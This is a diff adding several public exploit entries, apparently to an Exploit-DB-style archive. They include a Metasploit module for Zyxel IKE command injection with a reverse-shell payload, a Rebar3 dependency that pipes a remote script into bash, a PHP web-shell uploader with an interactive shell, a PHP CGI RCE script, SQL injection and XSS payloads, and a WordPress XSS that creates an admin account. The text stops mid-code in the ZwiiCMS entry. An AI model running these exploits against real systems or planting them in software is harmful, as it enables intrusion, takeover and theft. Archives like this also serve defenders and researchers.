diff --git a/exploits/hardware/remote/52049.rb b/exploits/hardware/remote/52049.rb
new file mode 100755
index 0000000000..47cafd353b
--- /dev/null
+++ b/exploits/hardware/remote/52049.rb
@@ -0,0 +1,152 @@
+# Exploit Title: Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution
+# Date: 2023-03-31
+# Exploit Author: sf
+# Vendor Homepage: https://www.zyxel.com/
+# Software Link: https://www.zyxel.com/
+# Version: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive),
+#          VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive)
+# Tested on: Linux
+# CVE : CVE-2023-28771
+
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Udp
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange
+          (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are
+          as follows: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive),
+          VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive). The
+          affected devices are vulnerable in a default configuration and command execution is with root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sf', # MSF Exploit & Rapid7 Analysis
+        ],
+        'References' => [
+          ['CVE', '2023-28771'],
+          ['URL', 'https://attackerkb.com/topics/N3i8dxpFKS/cve-2023-28771/rapid7-analysis'],
+          ['URL', 'https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls']
+        ],
+        'DisclosureDate' => '2023-03-31',
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true, # Code execution as 'root'
+        'DefaultOptions' => {
+          # We default to a meterpreter payload delivered via a fetch HTTP adapter.
+          # Another good payload choice is cmd/unix/reverse_bash.
+          'PAYLOAD' => 'cmd/linux/http/mips64/meterpreter_reverse_tcp',
+          'FETCH_WRITABLE_DIR' => '/tmp',
+          'FETCH_COMMAND' => 'CURL'
+        },
+        'Targets' => [ [ 'Default', {} ] ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          # The process /sbin/sshipsecpm may crash after we terminate a session, but it will restart.
+          'Stability' => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(500)
+      ]
+    )
+  end
+
+
+  def check
+    connect_udp
+
+    # Check for the Internet Key Exchange (IKE) service by sending an IKEv1 header with no payload. We can
+    # expect to receive an IKE reply containing a Notification payload with a PAYLOAD-MALFORMED message.
+
+    # In a default configuration, there appears no known method to identify the platform vendor or version
+    # number, so we cannot identify a CheckCode other than CheckCode::Detected or CheckCode::Unknown.
+    # If a VPN is configured on the target device, we may receive a Vendor ID corresponding to Zyxel, but we
+    # still would not be able to identify the version number of the target service.
+
+    ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI
+    ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI
+    ikev2_header << [0].pack('C') # Next Payload: None - 0
+    ikev2_header << [16].pack('C') # Version: 1.0 - 16 (0x10)
+    ikev2_header << [2].pack('C') # Exchange Type: Identity Protection - 2
+    ikev2_header << [0].pack('C') # Flags: None - 0
+    ikev2_header << [0].pack('N') # ID: 0
+    ikev2_header << [ikev2_header.length + 4].pack('N') # Length
+
+    udp_sock.put(ikev2_header)
+
+    ikev2_reply = udp_sock.get(udp_sock.def_read_timeout)
+
+    disconnect_udp
+
+    if !ikev2_reply.empty? && (ikev2_reply.length >= 40) &&
+       # Ensure the response 'Initiator SPI' field is the same as the original one sent.
+       (ikev2_reply[0, 8] == ikev2_header[0, 8]) &&
+       # Ensure the 'Next Payload' field is Notification (11)
+       (ikev2_reply[16, 1].unpack('C').first == 11 &&
+         # Ensure the 'Exchange Type' field is Informational (5)
+         (ikev2_reply[18, 1].unpack('C').first == 5)) &&
+       # Ensure the 'Notify Message Type' field is PAYLOAD-MALFORMED (16)
+       (ikev2_reply[38, 2].unpack('n').first == 16)
+      return CheckCode::Detected('IKE detected but device vendor and service version are unknown.')
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd)
+    connect_udp
+
+    cmd_injection = "\";bash -c \"#{cmd}\";echo -n \""
+
+    # This value is decoded by the packet decoder using a DES-CBC algorithm. The decoded value is written to the
+    # log file. As such the decoded value must not have any null terminator values as these will break our command
+    # payload. Therefore we use the below known good value that will decode to a suitable string, allowing the cmd
+    # injection payload to work as expected.
+    haxb48 = 'HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB'
+
+    ikev2_payload = [0].pack('C') # Next Payload: None - 0
+    ikev2_payload << [0].pack('C') # Reserved: 0
+    ikev2_payload << [8 + (haxb48.length + cmd_injection.length)].pack('n') # Length: 8 byte header + Notification Data
+    ikev2_payload << [1].pack('C') # Protocol ID: ISAKMP - 1
+    ikev2_payload << [0].pack('C') # SPI Size: None - 0
+    ikev2_payload << [14].pack('n') # Type: NO_PROPOSAL_CHOSEN - 14 (0x0E)
+    ikev2_payload << haxb48 + cmd_injection # Notification Data
+
+    ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI
+    ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI
+    ikev2_header << [41].pack('C') # Next Payload: Notify - 41 (0x29)
+    ikev2_header << [32].pack('C') # Version: 2.0 - 32 (0x20)
+    ikev2_header << [34].pack('C') # Exchange Type: IKE_SA_INIT - 34 (0x22)
+    ikev2_header << [8].pack('C') # Flags: Initiator - 8
+    ikev2_header << [0].pack('N') # ID: 0
+    ikev2_header << [ikev2_header.length + 4 + ikev2_payload.length].pack('N') # Length
+
+    packet = ikev2_header << ikev2_payload
+
+    udp_sock.put(packet)
+
+    disconnect_udp
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52051.txt b/exploits/multiple/webapps/52051.txt
new file mode 100644
index 0000000000..2084deb10e
--- /dev/null
+++ b/exploits/multiple/webapps/52051.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Rebar3 3.13.2 Command Injection
+# Date: 2020-06-03
+# Exploit Author: Alexey Pronin
+# Vendor Homepage: https://rebar3.org
+# Software Link: https://github.com/erlang/rebar3
+# Versions affected: 3.0.0-beta.3 - 3.13.2
+# Tested on: Linux
+# CVE: CVE-2020-13802
+
+1. Description:
+----------------------
+
+Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification.
+
+2. Proof of Concept:
+----------------------
+
+* Add dependency with any of the following specification:
+
+    {
+      'dephelper', ".*", {
+        hg, "https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git",
+      "dephelper"}
+    }
+
+    or
+
+    {
+      'poc_rebar3', ".*", {
+        git, "https://github.com/vulnbe/poc-rebar3.git"
+      }
+    }
+
+* Execute command: rebar3 clean
+
+References
+----------------------
+* [Rebar3 vulnerability analysis](https://vuln.be/post/rebar3-command-injection/)
+* [POC](https://github.com/vulnbe/poc-rebar3.git)
+* [Vulnerability remediation PR](https://github.com/erlang/rebar3/pull/2302)
+* [CVE-2020-13802](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13802)
\ No newline at end of file
diff --git a/exploits/php/webapps/52042.txt b/exploits/php/webapps/52042.txt
new file mode 100644
index 0000000000..7e64e20ccc
--- /dev/null
+++ b/exploits/php/webapps/52042.txt
@@ -0,0 +1,74 @@
+# Exploit Title:  Life Insurance Management Stored System- cross-site scripting (XSS)
+# Exploit Author: Aslam Anwar Mahimkar
+# Date: 18-05-2024
+# Category: Web application
+# Vendor Homepage: https://projectworlds.in/
+# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/
+# Version: AEGON LIFE v1.0
+# Tested on: Linux
+# CVE: CVE-2024-36599
+
+# Description:
+----------------
+
+A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.
+
+
+# Payload:
+----------------
+
+<script>alert(document.domain)</script>
+
+
+# Attack Vectors:
+-------------------------
+
+To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.
+
+# Burp Suite Request:
+----------------------------
+
+POST /lims/insertClient.php HTTP/1.1
+Host: localhost
+Content-Length: 30423
+Cache-Control: max-age=0
+sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQH
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/lims/addClient.php
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n
+Connection: close
+
+------WebKitFormBoundarymKfAe0x95923LzQH
+Content-Disposition: form-data; name="client_id"
+
+1716051159
+
+------WebKitFormBoundarymKfAe0x95923LzQH
+Content-Disposition: form-data; name="client_password"
+
+password
+
+------WebKitFormBoundarymKfAe0x95923LzQH
+Content-Disposition: form-data; name="name"
+
+<script>alert(document.domain)</script>
+
+------WebKitFormBoundarymKfAe0x95923LzQH
+Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"
+
+Content-Type: application/octet-stream
+
+
+ÿØÿà
\ No newline at end of file
diff --git a/exploits/php/webapps/52043.txt b/exploits/php/webapps/52043.txt
new file mode 100644
index 0000000000..303bfa8aed
--- /dev/null
+++ b/exploits/php/webapps/52043.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Persistent XSS in Carbon Forum 5.9.0 (Stored)
+# Date: 06/12/2024
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://www.94cb.com/
+# Software Link: https://github.com/lincanbin/Carbon-Forum
+# Version: 5.9.0
+# Tested on: Windows XP
+# CVE: N/A
+
+## Vulnerability Details
+
+A persistent (stored) XSS vulnerability was discovered in Carbon Forum
+version 5.9.0. The vulnerability allows an attacker to inject malicious
+JavaScript code into the Forum Name field under the admin settings. This
+payload is stored on the server and executed in the browser of any user who
+visits the forum, leading to potential session hijacking, data theft, and
+other malicious activities.
+
+## Steps to Reproduce
+
+1. Login as Admin: Access the Carbon Forum with admin privileges.
+2. Navigate to Settings: Go to the '/dashboard' and select the Basic
+section.
+3. Enter Payload : Input the following payload in the Forum Name field:
+
+    <script>alert('XSS');</script>
+
+4. Save Settings: Save the changes.
+5. The xss payload will triggers
\ No newline at end of file
diff --git a/exploits/php/webapps/52044.txt b/exploits/php/webapps/52044.txt
new file mode 100644
index 0000000000..e91a748508
--- /dev/null
+++ b/exploits/php/webapps/52044.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Persistent XSS in XMB 1.9.12.06
+# Date: 06/12/2024
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://www.xmbforum2.com/
+# Software Link: https://www.xmbforum2.com/download/XMB-1.9.12.06.zip
+# Version: 1.9.12.06
+# Tested on: Windows XP
+# CVE: N/A
+
+## Vulnerability Details
+
+A persistent (stored) XSS vulnerability was discovered in XMB 1.9.12.06.
+The vulnerability allows an attacker to inject malicious JavaScript code
+into a template or specific fields. This payload is stored on the server
+and executed in the browser of any user who visits the forum, leading to
+potential session hijacking, data theft, and other malicious activities.
+
+### XSS in Template
+
+An attacker can inject malicious JavaScript code into a template:
+
+1. Login as Admin: Access the XMB Forum with admin privileges.
+2. Navigate to the Administration Panel: Go to `/cp.php`, then in "Look &
+Feel" select "Templates". This will go to `/cp2.php?action=templates`.
+Select the "footer" template and click edit.
+3. Enter Payload: Add the XSS payload in the footer template:
+
+
+    <script>alert('XSS');</script>
+
+
+4. Save the Change: Click "Submit Changes".
+5. Trigger the Payload: The XSS payload will trigger anywhere the footer
+template is rendered.
+
+### XSS in News Ticker
+
+An attacker can inject malicious JavaScript code into the News Ticker field
+of the Front Page Options:
+
+1. Login as Admin: Access the XMB Forum with admin privileges.
+2. Navigate to the Administration Panel: Go to `/cp.php`, then in
+"Settings" go to "Front Page Options".
+3. Enter Payload: Add the XSS payload in the "News in Newsticker" field:
+
+   <img src=x onerror=alert(1)>
+
+
+4. Save the Change: Click "Submit Changes".
+5. Trigger the Payload: The XSS payload will trigger anywhere the News
+Ticker is displayed eg, home page
\ No newline at end of file
diff --git a/exploits/php/webapps/52045.txt b/exploits/php/webapps/52045.txt
new file mode 100644
index 0000000000..742b10ea11
--- /dev/null
+++ b/exploits/php/webapps/52045.txt
@@ -0,0 +1,224 @@
+# Exploit Title:  Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)
+# Exploit Author: Aslam Anwar Mahimkar
+# Date: 18-05-2024
+# Category: Web application
+# Vendor Homepage: https://projectworlds.in/
+# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/
+# Version: AEGON LIFE v1.0
+# Tested on: Linux
+# CVE: CVE-2024-36598
+
+# Description:
+----------------
+
+-An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file by adding image/gif magic bytes in payload.
+
+-In insertClient.php fileToUpload is only checking for image file but not checking for extensions, also header.php is not properly handling the redirection hence allowing Unauthenticated redirect.
+
+
+# Payload:
+------------------
+
+payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"
+
+
+# RCE via executing exploit:
+---------------------------------------
+
+    # Step : run the exploit in python with this command: python3 shell.py  http://localhost/lims/
+    # will lead to RCE shell.
+
+POC
+-------------------
+
+import argparse
+import random
+import requests
+import string
+import sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('url', action='store', help='The URL of the target.')
+args = parser.parse_args()
+
+url = args.url.rstrip('/')
+random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
+
+payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"
+
+file = {'fileToUpload': (random_file + '.php', payload, 'text/php')}
+print('> Attempting to upload PHP web shell...')
+r = requests.post(url + '/insertClient.php', files=file, data={'agent_id':''}, verify=False)
+print('> Verifying shell upload...')
+r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
+
+if random_file in r.text:
+    print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php')
+    print('> Example command usage: ' + url + '/uploads/' + random_file + '.php?cmd=whoami')
+    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
+    if launch_shell.lower() == 'y':
+        while True:
+            cmd = str(input('RCE $ '))
+            if cmd == 'exit':
+                sys.exit(0)
+            r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':cmd}, verify=False)
+            print(r.text)
+else:
+    if r.status_code == 200:
+        print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
+    else:
+        print('> Web shell failed to upload! The web server may not have write permissions.')
+
+---------------------------------------------------------------------------------------------------------------------------
+
+### Can also performed manually.
+
+
+Payload:
+--------------
+
+GIF89a;
+<?php
+echo"<pre>";
+passthru($_GET['cmd']);
+echo"<pre>";
+?>
+
+# Attack Vectors:
+-------------------------
+
+After uploading malicious image can access it to get the shell
+
+http://localhost/lims/uploads/shell2.gif.php?cmd=id
+
+
+Burp Suit Request
+-----------------------------
+
+POST /lims/insertClient.php HTTP/1.1
+Host: localhost
+Content-Length: 2197
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5plGALZGPOOdBlF0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/lims/addClient.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="client_id"
+
+1716015032
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="client_password"
+
+Password
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="name"
+
+Test
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="fileToUpload"; filename="shell2.gif.php"
+Content-Type: application/x-php
+
+GIF89a;
+<?php
+echo"<pre>";
+passthru($_GET['cmd']);
+echo"<pre>";
+?>
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="sex"
+
+Male
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="birth_date"
+
+1/1/1988
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="maritial_status"
+
+M
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="nid"
+
+1
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="phone"
+
+1
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="address"
+
+1
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="policy_id"
+
+1
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="agent_id"
+
+Agent007
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="nominee_id"
+
+1716015032-275794639
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="nominee_name"
+
+Test1
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="nominee_sex"
+
+1
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="nominee_birth_date"
+
+1
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="nominee_nid"
+
+1
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="nominee_relationship"
+
+1
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="priority"
+
+1
+
+------WebKitFormBoundary5plGALZGPOOdBlF0
+Content-Disposition: form-data; name="nominee_phone"
+
+1
+------WebKitFormBoundary5plGALZGPOOdBlF0
\ No newline at end of file
diff --git a/exploits/php/webapps/52046.txt b/exploits/php/webapps/52046.txt
new file mode 100644
index 0000000000..ad50226d67
--- /dev/null
+++ b/exploits/php/webapps/52046.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Life Insurance Management System- SQL injection vulnerability.
+# Exploit Author: Aslam Anwar Mahimkar
+# Date: 18-05-2024
+# Category: Web application
+# Vendor Homepage: https://projectworlds.in/
+# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/
+# Version: AEGON LIFE v1.0
+# Tested on: Linux
+# CVE: CVE-2024-36597
+
+# Description:
+----------------
+
+Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users.
+
+# Payload:
+------------------
+
+client_id=1511986023%27%20OR%201=1%20--%20a
+
+# Steps to reproduce
+--------------------------
+ -Login with your creds
+ -Navigate to this directory - /client.php
+ -Click on client Status
+ -Will navigate to /clientStatus.php
+ -Capture the request in burp and inject SQLi query in client_id= filed
+
+# Burp Request
+-------------------
+
+
+GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1
+Host: localhost
+sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n
+Connection: close
\ No newline at end of file
diff --git a/exploits/php/webapps/52047.py b/exploits/php/webapps/52047.py
new file mode 100755
index 0000000000..f6e8b06cfe
--- /dev/null
+++ b/exploits/php/webapps/52047.py
@@ -0,0 +1,63 @@
+# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
+# Exploit Author: Yesith Alvarez
+# Vendor Homepage: https://www.php.net/downloads.php
+# Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29
+# CVE : CVE-2024-4577
+
+from requests import Request, Session
+import sys
+import json
+
+
+
+def title():
+    print('''
+
+   _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______
+  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  |
+ | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / /
+ | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \   / /    / /
+ | |____   \  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /
+  \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/
+
+
+Author: Yesith Alvarez
+Github: https://github.com/yealvarez
+Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
+Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py
+    ''')
+
+
+def exploit(url, command):
+    payloads = {
+        '<?php echo "vulnerable"; ?>',
+        '<?php echo shell_exec("'+command+'"); ?>'
+    }
+    headers = {
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
+    'Content-Type': 'application/x-www-form-urlencoded'}
+    s = Session()
+    for payload in payloads:
+        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
+        req = Request('POST', url, data=payload, headers=headers)
+        prepped = req.prepare()
+        del prepped.headers['Content-Type']
+        resp = s.send(prepped,
+        verify=False,
+        timeout=15)
+        #print(prepped.headers)
+        #print(url)
+        #print(resp.headers)
+        #print(payload)
+        print(resp.status_code)
+        print(resp.text)
+
+
+if __name__ == '__main__':
+    title()
+    if(len(sys.argv) < 2):
+        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))
+        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))
+        exit(0)
+    else:
+        exploit(sys.argv[1],sys.argv[2])
\ No newline at end of file
diff --git a/exploits/php/webapps/52048.txt b/exploits/php/webapps/52048.txt
new file mode 100644
index 0000000000..2ccea25a8f
--- /dev/null
+++ b/exploits/php/webapps/52048.txt
@@ -0,0 +1,44 @@
+# Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated)
+# Google Dork: inurl:/wp-content/plugins/wp-useronline/
+# Date: 2024-06-12
+# Exploit Author: Onur Göğebakan
+# Vendor Homepage: https://github.com/lesterchan/wp-useronline
+# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
+# Category: Web Application
+# Version: 2.88.0
+# Tested on: WordPress 6.5.4 - Windows 10
+# CVE : CVE-2022-2941
+
+# Explanation:
+A new administrator user can be added to WordPress using a stored XSS vulnerability.
+
+
+# Exploit:
+  1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings
+  2. Click Save and intercept the request.
+  3. Change `naming%5Bbots%5D` parameter value with belowed payload
+  ```
+    %3Cscript%3E+function+handleResponse%28%29+%7B+var+nonce+%3D+this.responseText.match%28%2Fname%3D%22_wpnonce_create-user%22+value%3D%22%28%5Cw%2B%29%22%2F%29%5B1%5D%3B+var+changeReq+%3D+new+XMLHttpRequest%28%29%3B+changeReq.open%28%27POST%27%2C%27%2Fwp-admin%2Fuser-new.php%27%2Ctrue%29%3B+changeReq.setRequestHeader%28%27Content-Type%27%2C%27application%2Fx-www-form-urlencoded%27%29%3B+var+params+%3D+%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%2Bnonce%2B%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%27%2B%27%26user_login%3Dadmin%26email%3Dadmin%2540mail.com%26first_name%3D%26last_name%3D%26url%3D%26pass1%3Dadmin%26pass2%3Dadmin%26pw_weak%3Don%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B+changeReq.send%28params%29%3B+%7D+var+req+%3D+new+XMLHttpRequest%28%29%3B+req.onload+%3D+handleResponse%3B+req.open%28%27GET%27%2C+%27%2Fwp-admin%2Fuser-new.php%27%2C+true%29%3B+req.send%28%29%3B+%3C%2Fscript%3E
+  ```
+  4. Payload executed when user visited http://poc.test/wp-admin/index.php?page=useronline
+  5. Administrator user added with admin:admin credentials.
+
+
+# Decoded payload
+```
+function handleResponse() {
+    var nonce = this.responseText.match(/name="_wpnonce_create-user" value="(\w+)"/)[1];
+    var changeReq = new XMLHttpRequest();
+    changeReq.open('POST', '/wp-admin/user-new.php', true);
+    changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
+    var params = 'action=createuser&_wpnonce_create-user=' + nonce +
+        '&_wp_http_referer=%2Fwp-admin%2Fuser-new.php' +
+        '&user_login=admin&email=admin%40mail.com&first_name=&last_name=&url=&pass1=admin&pass2=admin&pw_weak=on&role=administrator&createuser=Add+New+User';
+    changeReq.send(params);
+}
+
+var req = new XMLHttpRequest();
+req.onload = handleResponse;
+req.open('GET', '/wp-admin/user-new.php', true);
+req.send();
+```
\ No newline at end of file
diff --git a/exploits/php/webapps/52050.txt b/exploits/php/webapps/52050.txt
new file mode 100644
index 0000000000..78f500d818
--- /dev/null
+++ b/exploits/php/webapps/52050.txt
@@ -0,0 +1,62 @@
+# Exploit Title: ZwiiCMS 12.2.04 Remote Code Execution (Authenticated)
+# Date: 03/06/2023
+# Exploit Author: Hadi Mene
+# Vendor Homepage: https://zwiicms.fr/
+# Version: 12.2.04 and potentially lower versions
+# Tested on: Linux
+# CVE: CVE-2020-10567
+# Category: webapps
+
+
+ZwiiCMS 12.2.04 uses "Responible FileManager" 9.14.0 for its file manager feature. ZwiiCMS is vulnerable to CVE-2020-10567 as it is possible for
+an authenticated user to use ajax_calls.php to upload a php file via a base64 encoded file and gain Remote Code Execution
+due to a lack of extension check on the uploaded file.
+
+Original CVE author : hackoclipse
+https://github.com/trippo/ResponsiveFilemanager/issues/600
+
+
+Vulnerable code (ajax_calls.php) :
+
+// there is no extension check on $_POST['name'] and the content of $_POST['url'] can be b64 decoded without being
+necessarily an image
+
+81  case 'save_img':
+82      $info = pathinfo($_POST['name']);
+83  $image_data = $_POST['url'];
+84
+85  if (preg_match('/^data:image\/(\w+);base64,/', $image_data, $type)) {
+86       $image_data = substr($image_data, strpos($image_data, ',') + 1);
+87       $type = strtolower($type[1]); // jpg, png, gif
+88
+89       $image_data = base64_decode($image_data);
+
+
+PoC:
+
+1) Login in the Administration Panel.
+2) Click on the Folder icon on the top of the panel.
+3) Open the Developer Tools for that page.
+4) Copy,Edit and Execute the Javascript Code below .
+5) Access your PHP shell at http://ZWIICMS_URL/site/file/source/shell.php?cmd=COMMAND
+
+Javascript Code
+######
+
+function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "https:\/\/192.168.0.27\/zwiicms\/core\/vendor\/filemanager\/ajax_calls.php?action=save_img", true);
+        xhr.setRequestHeader("Accept", "*\/*");
+        xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
+        xhr.withCredentials = true;
